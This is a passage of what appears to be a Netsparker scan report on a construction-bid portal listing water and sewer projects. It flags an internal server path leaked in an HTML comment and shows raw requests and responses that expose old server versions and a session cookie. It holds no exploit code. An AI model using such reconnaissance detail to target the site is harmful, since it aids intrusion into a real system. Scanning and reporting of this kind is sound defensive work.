</tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat1048445"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=453856#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16<span><span class="prj_num">(#1438657)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Oliver - Beulah, ND</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 01:30:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data">Separate sealed bids for construction of <B><U>OMND Regional Service Area, Center Elevated Tank, Contract 5-16</U></B> will be received by the <U>North Dakota State Water Commission (NDSWC), Bismarck, ND</U> until <B><U>1:30</U></B> P.M., Local Time on the <B><U>3rd</U></B> day of <B><U>March</U>, 2011</B> where and at which time they will be publicly opened and read aloud.<BR><BR>The scope of WORK generally consists of furnishing and installing one elevated composite, or
spheroid style steel potable water storage tank, 750,000 gallons (min.), 175’ to overflow,
complete with access road, inlet/outlet piping, foundation, site piping, appurtenances, painting,
sitework, outlet structure and other appurtenant items as required by the Project Drawings, Specifications, and Contract Documents. The Center Elevated Tank site is located in Oliver County, approximately 12 miles south of the City of Beulah, North Dakota.<BR><BR>Each BID must be accompan..
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21107
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1438657&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1438657&group=11&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat324403"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=453856#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat1048445"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=453856#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16<span><span class="prj_num">(#1438657)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Oliver - Beulah, ND</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 01:30:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data">Separate sealed bids for construction of <B><U>OMND Regional Service Area, Center Elevated Tank, Contract 5-16</U></B> will be received by the <U>North Dakota State Water Commission (NDSWC), Bismarck, ND</U> until <B><U>1:30</U></B> P.M., Local Time on the <B><U>3rd</U></B> day of <B><U>March</U>, 2011</B> where and at which time they will be publicly opened and read aloud.<BR><BR>The scope of WORK generally consists of furnishing and installing one elevated composite, or
spheroid style steel potable water storage tank, 750,000 gallons (min.), 175’ to overflow,
complete with access road, inlet/outlet piping, foundation, site piping, appurtenances, painting,
sitework, outlet structure and other appurtenant items as required by the Project Drawings, Specifications, and Contract Documents. The Center Elevated Tank site is located in Oliver County, approximately 12 miles south of the City of Beulah, North Dakota.<BR><BR>Each BID must be accompan..
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
6
TOTAL
INFORMATION
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Remediation
- Error messages should be disabled.
- Remove this kind of private data from the output.
External References
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8120
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=765295#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=765295#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657">NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Quest Project #1438657)</a></div> <div class="prj_data"> Oliver - Beulah, ND; Bids close: 03/03/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Ave<BR>Bismarck ND 58505; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1477107">Southern Black Hills Rural Water System: Supervisory Control & Data Acquisition (SCADA) (Quest Project #1477107)</a></div> <div class="prj_data"> Fall River - Hot Springs, SD; Bids close: 03/07/2011, 01:00:00 PM; Bids received by: Southern Black Hills Rural Water System<BR>C/O Gunderson, Palmer, Goodsell & Nelson, Talbot J. Wieczorek - Attention: Karen Webb<BR>440 MT Rushmore Rd<BR>Rapid City SD 57709; Estimated Value: ; </div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1483322">NDSWC: Ray Christensen & Jung Lake Pump Station Upgrades Contract 4-3A/4-4A (Quest Project #1483322)</a></div> <div class="prj_data"> Hettinger/Stark - New England/Dickinson, ND; Bids close: 03/24/2011, 01:30:00 PM; Bids received by: NDSWC<BR>900 E. Boulevard Avenue<BR>Bismarck, ND 58505; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="11"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8120
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=765295#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td width="14"></td> <td width="20"></td> <td width="210"> <div class="prj_title"><a href="/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=1464405">City of Chelsea, Iowa: Sanitary Sewer Improvements Project (Quest Project #1464405)</a></div> <div class="prj_data"> Tama - Chelsea, IA; Bids close: 03/03/2011, 02:00:00 PM; Bids received by: City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215; Estimated Value: ; </div> </td> </tr> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=1048445&group=11&provider=765295#cat1048445">Water Resources Infrastructure ( 3 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"></td> <td width="20" height="15"></td> <td width="210" height="15"></td> </tr> <tr> <td 